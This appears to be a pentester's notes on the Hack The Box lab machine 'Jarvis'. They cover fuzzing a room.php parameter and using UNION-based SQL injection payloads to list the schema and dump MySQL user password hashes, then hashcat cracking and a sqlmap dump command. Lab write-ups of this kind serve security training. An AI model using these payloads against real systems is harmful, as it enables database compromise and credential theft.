80

Possible SQL injection

 wfuzz -u http://supersecurehotel.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404

Weed out chars that change the response. Send to repeater and manually fuzz

  • + and - could be for math

    • 1+1

    • 1 + 1

    • "1" + "1"

    • 2 - 1

  • . could mean it's an integer and not a float

  • ; ending the SQL statement

+ . ;
GET /room.php?cod=3-1

Math injection works

SQL Query most likely looks like this

SELECT id, image, rating, name, cost, description from rooms where cod = 1

We can do any of the operations after the where condtion

UNION SELECT is after the where condition but not in the table for some reason

Comes back as true

http://supersecurehotel.htb/room.php?cod=1%20union%20select%1,2,3,4,5,6,7

The statement should look like

SELECT id, image, rating, name, cost, description, UNKNOWN from rooms where cod = 1 union select 1,2,3,4,5,6,7

If the initial query is false then we can overwrite the output

http://supersecurehotel.htb/room.php?cod=69%20union%20select%"1","2","Adot8","4","5","6","7"
https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheetpentestmonkey.net
GET /room.php?cod=69+union+select+1,2,(select+@@version),4,5,6,7 
union select 1,2,(select schema_name from information_schema.schemata LIMIT 1)
GET /room.php?cod=69+union+select+1,2,(select+group_concat(schema_name,":")+from+information_schema.schemata),4,5,6,7 
union select 1,2,(select group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'),4,5,6,7
GET /room.php?cod=69+union+select+1,2,(select+group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n")+from+information_schema.COLUMNS+where+TABLE_SCHEMA+=+'hotel'),4,5,6,7 
union select 1,2,(select group_concat(host,":",user,":",password,"\r\n") from mysql.user),4,5,6,7
GET /room.php?cod=69+union+select+1,2,(select+group_concat(host,"%3a",user,":",password,"\r\n")+from+mysql.user),4,5,6,7 
hashcat -m 300 dbadmin.hash ~/rockyou.txt -O

OR

adot@kali:~/oscp/htb/linux/jarvis$ sqlmap -r req -D mysql -T user --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.5#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:29:37 /2024-06-02/

[11:29:37] [INFO] parsing HTTP request from 'req'
PreviousEumerationNext64999

Last updated

Was this helpful?